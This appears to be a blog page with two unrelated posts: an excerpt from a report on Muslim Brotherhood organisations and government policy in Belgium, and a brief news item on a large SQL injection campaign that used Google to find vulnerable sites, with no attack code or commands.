    The record of the Brotherhood operations in Brussels is more mixed. Beyond sponsoring a youth conference under the auspices of the Council of Europe, the Ligue Islamique Interculturelle De Belgique does not appear to have succeeded in gaining recognition from any governmental organizations and the Belgian government does appear to have succeeded in keeping the Brotherhood out of the government-sponsored Muslim council by screening the members for extremist backgrounds. This is in sharp contrast to France, for example, where the government sponsored elections resulted in a dominant role for the Muslim Brotherhood organization there. Although, as this report has documented, the Belgian Brotherhood has recently created a series of new national organizations, it is not clear that any of them has yet been particularly active or successful. Far more successful have been the Belgian-based components of the Federation of Islamic Organizations in Europe (FIOE), particularly the Forum of European Muslim Youth and Student Organizations (FEMYSO), which have managed to achieve official status at the UN, as well as with the Council of Europe and the European Commission. In addition, the location of the FIOE national office in Brussels has resulted in elevating the status of the Belgian branch that recently reported becoming “very active.” Leading the FIOE office in Brussels is Bassem Hatahet, whose name appears on virtually all of the paperwork associated with the Muslim Brotherhood organizations in Belgian. This would appear to confirm Mr. Hatahet’s role as the most important figure in the Belgian Brotherhood as reported by the Belgian security services.

    It is not clear why Al-Aqsa Belgium and CECIV/Essalem were not included as part of the Belgian Muslim Brotherhood. It is also not clear why the Belgian government never acted to shutdown Al-Aqsa Belgium as both Germany and the Netherlands did. While sources in the Belgian security service say this was due to the lack of a Belgian anti-terror law, it should also be noted that in 2006, Belgium, along with France and Ireland, argued against declaring the political wing of Hamas a terrorist group, a position that might shed light on the thinking behind the decision.

  • Mass attack against 10.000-plus sites is a still-ongoing SQL injection attack, thanks to Google

    According to analysis coordinated by the Internet Storm Center, the mass attack against 10.000 sites some weeks ago was a pure SQL injection attack on an industrial scale. There are some other points of interest in the story:

    * They used a special tool for it that goes through the process in an adapted way.

    * Google is used to find vulnerable machines, so you ask yourself how long search engines want to stay 'partners in crime' by giving out information that shouldn't be leaked.

    * The attacks are still going on.

    http://isc.sans.org/diary.html?storyid=4294&rss